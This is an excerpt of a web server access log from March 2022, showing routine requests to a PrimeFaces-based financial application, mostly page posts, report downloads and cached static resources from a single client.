201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /reportes_sipse/sdg/ServletReporte?reporte=solicitud_cdp&Solicitud=17656&pfdrid_c=false HTTP/1.1" 200 119993
201.245.192.253 - - [29/Mar/2022:06:49:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/detalleSolicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 132090
172.22.2.4 - - [29/Mar/2022:06:48:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/detalleSolicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 26090
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:24 -0500] "POST /sipse/faces/presentacion/financiero/cdp/expedirCdp.xhtml HTTP/1.1" 200 2480
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "POST /sipse/faces/presentacion/financiero/cdp/expedirCdp.xhtml HTTP/1.1" 200 19844
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "POST /sipse/faces/presentacion/financiero/cdp/consultarActividadesCDP.xhtml HTTP/1.1" 200 22706
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:50:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
